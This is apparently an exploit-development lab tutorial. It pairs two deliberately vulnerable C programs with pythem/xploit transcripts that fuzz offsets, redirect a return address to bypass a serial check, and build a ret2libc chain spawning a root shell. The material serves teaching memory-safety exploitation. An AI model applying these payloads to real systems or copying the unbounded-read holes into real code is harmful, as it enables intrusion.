Exploit development
- Vulnerable Serial-Key C program.
//Code from "Shellcoder's Handbook: Discovering and Exploiting Security Holes"
//Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial
//Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space
//
// Intentionally vulnerable training program: validate_serial() reads stdin
// with an unbounded "%s" into a 24-byte stack buffer. The walkthrough below
// overflows it so that validate_serial's saved return address is replaced
// with the address of do_valid_stuff(), bypassing the serial check entirely.
// NOTE(review): the 40-byte offset used in the walkthrough depends on the
// frame layout gcc produces for this exact source and flags; leave the
// locals as they are, and recompute the offset/address on your own build.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

// Checksum-style validity test on a NUL-terminated serial.
// Accepts only when: length >= 10, every byte lies in the raw char range
// '0'..'z' (so the punctuation between '9' and 'A' also passes), and the
// byte sum is congruent to 83 modulo 853.
// Returns 1 for a valid serial, 0 otherwise.
int valid_serial(char *psz){
    size_t len = strlen(psz);
    unsigned total = 0;
    size_t i;
    if (len < 10)
        return 0;
    for(i = 0; i < len ; i++){
        // Reject any byte outside the '0'..'z' range before summing it.
        if ((psz[i] < '0') || (psz[i] > 'z' ))
            return 0;
        total += psz[i];
    }
    if (total % 853 == 83)
        return 1;
    return 0;
}

// Reads one whitespace-delimited token from stdin and checks it.
// VULNERABLE: "%s" carries no width limit, so a token longer than 23 bytes
// writes past `serial` into the saved registers and return address of this
// frame (a bounded version would use "%23s"; deliberately not applied here,
// since this overflow is the subject of the page). The fscanf() result is
// also unchecked: on EOF `serial` is read by valid_serial() uninitialized.
// Returns 1 if the serial is valid, 0 otherwise.
int validate_serial(){
    char serial[24];
    fscanf(stdin, "%s", serial);
    if (valid_serial(serial))
        return 1;
    else
        return 0;
}

// Target of the walkthrough: normally reachable only with a valid serial;
// the overflow makes validate_serial() return directly here instead.
// Never returns (exit(0)).
int do_valid_stuff(){
    printf("The serial number is valid!\n");
    // do serial-restricted, valid stuff here.
    exit(0);
}

// Failure path; never returns (exit(1)).
int do_invalid_stuff(){
    printf("Invalid serial number!\nExiting\n");
    exit(1);
}

// Entry point: dispatches on the serial check; both callees exit().
int main(int argc, char *argv[] ){
    if(validate_serial())
        do_valid_stuff();
    else
        do_invalid_stuff();
    return 0;
}
- commands:
pythem> echo 0 > /proc/sys/kernel/randomize_va_space pythem> gcc serial.c -fno-stack-protector -o serial pythem> ./serial 123456 Invalid serial number! Exiting pythem> set file ./serial pythem> xploit stdin xploit> disas main Dump of assembler code for function main: ... callq 0x400723 <do_valid_stuff> (Function that only authenticated person has access.) ... xploit> fuzz ... [*] Sending buffer with lenght: 39 [*] Child program exited with code 1 [*] Hit enter to continue. [*] Sending buffer with lenght: 40 [*] Sending buffer with lenght: 41 [*] Child program crashed with SIGSEGV code: -11 ^C xploit> set arch x64 xploit> set offset [+] Enter the offset (number of 'A's): 40 xploit> set addr1 [+] First address to overwrite: 0x400723 xploit> xploit [+] Writing payload into buffer.txt [*] Sending buffer with lenght: 58 The serial number is valid! Exiting
- Buffer-overflow vulnerable C program (exploited below with a ret2libc chain; note that the resulting shell is root only because the binary itself is run as root in the transcript, not because the overflow elevates privileges).
// Disable Canaries, Compile: gcc -fno-stack-protector vuln.c -o vuln
// Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space
//
// Intentionally vulnerable training program: vuln() reads up to 200 bytes
// into a 40-byte stack buffer. The walkthrough below turns the overflow into
// a ret2libc chain: saved return address -> `pop rdi; ret` gadget ->
// address of "/bin/sh" in libc -> system(). With ASLR disabled the libc
// addresses found in the debugger are the same ones the program sees at run time.
// NOTE(review): the offset (56), the gadget address and the libc addresses
// in the transcript are specific to that build and libc; recompute them locally.
#include <stdio.h>
#include <unistd.h>

// Reads from stdin and echoes what it got.
// VULNERABLE: read() may store up to 200 bytes into the 40-byte `buf`, so
// anything past byte 40 overwrites what follows `buf` on the stack, up to
// and including the saved return address. Two further defects a reviewer
// would flag: `r` is never checked (read() returns -1 on error), and `buf`
// is never NUL-terminated, so the "%s" below can print stack bytes beyond
// what was actually read. Both are left as-is on purpose for the exercise.
// Returns 0.
int vuln() {
    char buf[40];
    int r;
    r = read(0, buf, 200);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    return 0;
}

// Entry point: prints a banner (no trailing newline) and calls vuln().
// NOTE(review): this literal prints "Try to sh", whereas the transcript
// below shows "Try to bash" — one of the two appears to be out of date.
int main(int argc, char *argv[]) {
    printf("Try to sh");
    vuln();
    return 0;
}
- commands:
pythem> echo 0 > /proc/sys/kernel/randomize_va_space pythem> gcc vuln.c -fno-stack-protector -o vuln pythem> set file ./vuln pythem> xploit stdin xploit> set arch x64 xploit> fuzz ... [*] Sending buffer with lenght: 48 ... [*] Child program exited with code: 0 [*] Hit enter to continue. [*] Sending buffer with lenght: 49 ... [*] Child program crashed with SIGSEGV code: -11 ... [+] Sending buffer with lenght: 55 ... [+] Instruction Pointer may be near: 55 [*] Child program crashed with code: -7 ... [*] Sending buffer with lenght: 58 ... [*] Child program crashed with SIGSEGV code: -11 ^C
The crashes begin between 55 and 58 bytes, so the saved return address sits at offset 56 — the value used below.
xploit> set offset 56 xploit> search instructions [+] Find: % rdi ... [INFO] File: ./vuln 0x0000000000400613: pop rdi; ret; xploit> set addr1 [+] First address to overwrite: 0x0000000000400613 xploit> find "/bin/sh" ... Found 1 results, display max 1 items: libc : 0x7ffff7b9c598 --> 0x68732f6e69622f ('/bin/sh') xploit> set addr2 [+] Second address to overwrite: 0x7ffff7b9c598 xploit> p system ... $1 = {<text variable, no debug info>} 0x7ffff7a76710 <__libc_system> xploit> set shellcode [+] Enter the shellcode: 0x7ffff7a76710 xploit> xploit [+] Writing payload into buffer.txt [*] Sending buffer with lenght: 98 ... [!] If it does not work automatically, run on terminal: (cat buffer.txt ; cat) | ./vuln xploit> exit pythem> exit # (cat buffer.txt; cat) | ./vuln Try to bash Read 98 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb id uid=0(root) gid=0(root) groups=0(root) whoami root